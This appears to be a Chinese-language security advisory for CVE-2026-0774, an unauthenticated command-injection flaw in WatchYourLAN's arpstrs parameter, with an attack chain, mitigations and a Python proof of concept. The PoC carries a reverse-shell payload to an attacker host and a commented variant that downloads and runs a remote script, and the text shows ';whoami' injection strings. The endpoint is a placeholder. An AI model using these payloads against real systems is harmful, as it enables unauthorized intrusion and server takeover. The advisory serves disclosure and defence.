CVE-2026-0774 WatchYourLAN配置页面参数注入远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2026-0774

漏洞类型

参数注入远程代码执行

CVSS评分

8.8 高危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WatchYourLAN

漏洞概述

CVE-2026-0774是WatchYourLAN中的一个高危安全漏洞，CVSS评分达到8.8分。该漏洞属于配置页面参数注入导致的远程代码执行（RCE）漏洞，存在于WatchYourLAN的配置处理模块中。攻击者可以通过构造恶意的arpstrs参数值，在受影响的系统上执行任意代码。值得注意的是，该漏洞不需要任何认证即可被利用，攻击者只需处于网络相邻位置即可发起攻击。由于WatchYourLAN通常部署在局域网环境中用于网络设备监控，攻击者在获取内网访问权限后，可以利用此漏洞获取服务器控制权限，进而可能横向移动到其他系统。此漏洞的发现者为趋势科技（Trend Micro）的零日 Initiative（ZDI）团队，编号为ZDI-CAN-26708。

技术细节

该漏洞的根本原因在于WatchYourLAN在处理arpstrs参数时缺乏充分的输入验证。具体来说，程序直接将用户提供的arpstrs参数值传递给系统调用（system call），而没有对特殊字符或命令分隔符进行过滤或转义处理。攻击者可以通过在arpstrs参数中注入Shell命令元字符（如分号、管道符、反引号等）来执行任意系统命令。例如，攻击者可以构造形如`;whoami`或`$(whoami)`的恶意payload，当程序将该参数传递给system()函数时，注入的命令将被执行。由于漏洞存在于配置页面处理逻辑中，且无需认证即可访问，因此具有较高的安全风险。成功利用此漏洞后，攻击者可以在服务账户的上下文中执行代码，从而获取服务器控制权限。修复此类漏洞的标准方法是使用参数化调用或对用户输入进行严格的验证和转义处理。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先识别目标网络上运行WatchYourLAN的服务器，扫描开放的端口（默认8840）并确认服务可访问。

STEP 2

步骤2: 构造恶意Payload

攻击者构造包含Shell命令注入的arpstrs参数值，使用分号、管道符或命令替换等技巧注入恶意命令，如反弹Shell或下载执行恶意脚本。

STEP 3

步骤3: 发送恶意请求

攻击者向WatchYourLAN的配置页面发送HTTP GET请求，将恶意payload作为arpstrs参数值传递。由于无需认证，攻击者可以直接访问漏洞端点。

STEP 4

步骤4: 命令执行

WatchYourLAN将未经验证的arpstrs参数值直接传递给system()函数调用，导致注入的命令在服务器上以服务账户权限执行。

STEP 5

步骤5: 建立持久化

成功执行代码后，攻击者可以部署后门程序、建立持久化访问、窃取敏感数据或横向移动到内网其他系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-0774 PoC - WatchYourLAN Argument Injection RCE
# Target: WatchYourLAN configuration page
# Vulnerability: Unvalidated arpstrs parameter passed to system call

target_url = "http://target:8840"  # Default WatchYourLAN port

# Payload to execute arbitrary command via arpstrs parameter
# Using semicolon to chain commands and reverse shell connection
malicious_payload = ";bash -i >& /dev/tcp/attacker_ip/attacker_port 0>&1"

# Alternative payload using command substitution
# malicious_payload = "$(wget http://attacker_ip/shell.sh -O /tmp/shell.sh && bash /tmp/shell.sh)"

# Construct the exploit request
params = {
    'arpstrs': malicious_payload
}

try:
    # Send the malicious request to the configuration page
    # No authentication required (PR:N)
    response = requests.get(f"{target_url}/some/config/endpoint", params=params, timeout=10)
    
    print(f"[*] Request sent to {target_url}")
    print(f"[*] Payload: {malicious_payload}")
    print(f"[*] Response status: {response.status_code}")
    
    if response.status_code == 200:
        print("[+] Exploit request completed. Check for reverse shell.")
    else:
        print("[-] Unexpected response code")
        
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed: {e}")

# Note: This PoC demonstrates the vulnerability concept.
# Actual exploitation requires identifying the correct endpoint and parameter handling.

影响范围

WatchYourLAN < 修复版本

WatchYourLAN 所有未打补丁版本

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1) 使用网络访问控制列表（ACL）限制对WatchYourLAN管理界面的访问，仅允许受信任的IP地址访问；2) 在网络边界部署防火墙，阻止来自非信任区域的访问；3) 监控和记录所有对配置页面的请求，特别关注包含特殊字符的arpstrs参数；4) 考虑使用反向代理或VPN通道访问管理界面；5) 定期检查日志文件，排查可疑活动痕迹。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-0774
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-0774
3 Details https://www.cvedetails.com/cve/CVE-2026-0774/
4 VulDB https://vuldb.com/cve/CVE-2026-0774
5 Link https://www.zerodayinitiative.com/advisories/ZDI-26-039/